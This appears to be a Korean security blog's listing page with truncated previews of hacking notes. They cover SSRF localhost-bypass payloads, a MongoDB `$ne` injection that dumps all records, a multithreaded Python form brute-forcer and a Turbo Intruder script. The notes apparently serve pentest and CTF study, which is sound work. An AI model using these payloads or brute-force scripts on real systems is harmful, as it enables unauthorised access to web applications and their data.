본문 바로가기

(12)
SSRF localhost, 127.0.0.1 bypass http://vcap.me:1530http://0x7f.0x00.0x00.0x01:1530http://0x7f000001:1530http://2130706433:1530http://Localhost:1530고수가 우회하는법 http://127.0.0.1http://0.0.0.0http://localhosthttp://[::]http://0000::1http://spoofed.burpcollaborator.nethttp://localtest.mehttp://localhost.hahwul.comhttp://127.127.127.127http://127.0.1.3http://127.0.0.0http://0/http://127.1http://127.0.1http://2130706433http://0177.0.0..
MongoDB_Injection 안쓰면 항상 까먹기때문에 정리해둔다. 비교연산 이용 $eq지정된 값과 같은 값을 찾습니다. (equal)$gt지정된 값보다 큰 값을 찾습니다. (greater than)$gte지정된 값보다 크거나 같은 값을 찾습니다. (greater than equal)$in배열 안의 값들과 일치하는 값을 찾습니다. (in)$lt지정된 값보다 작은 값을 찾습니다. (less than)$lte지정된 값보다 작거나 같은 값을 찾습니다. (less than equal)$ne지정된 값과 같지 않은 값을 찾습니다. (not equal)$nin배열 안의 값들과 일치하지 않는 값을 찾습니다. (not in){"id": {"$ne":""}, "pw": {"$ne":""}}​ 다음처럼 $ne와 같은 비교연산자를 통해 모든결과를 출력가능..
Python 쓰레드로 한번에 웹에 requests로 브루트포싱하기 import requestsfrom concurrent.futures import ThreadPoolExecutorurl="input URL"def exploit(num): return requests.post(url,data={"form1":"1234","form2":"1234","form3":num})val=[i for i in range(0,101)]with ThreadPoolExecutor(max_workers=100) as executor: results=list(executor.map(exploit,val)) for i in results: print(i) import requestsimport threadingurl="input URL"for i in range(..
Turbo Intruder에서 word list를 못 찾아올때 # Find more example scripts at https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/default.pydef queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=5, requestsPerConnection=100, pipeline=False ) for i in range..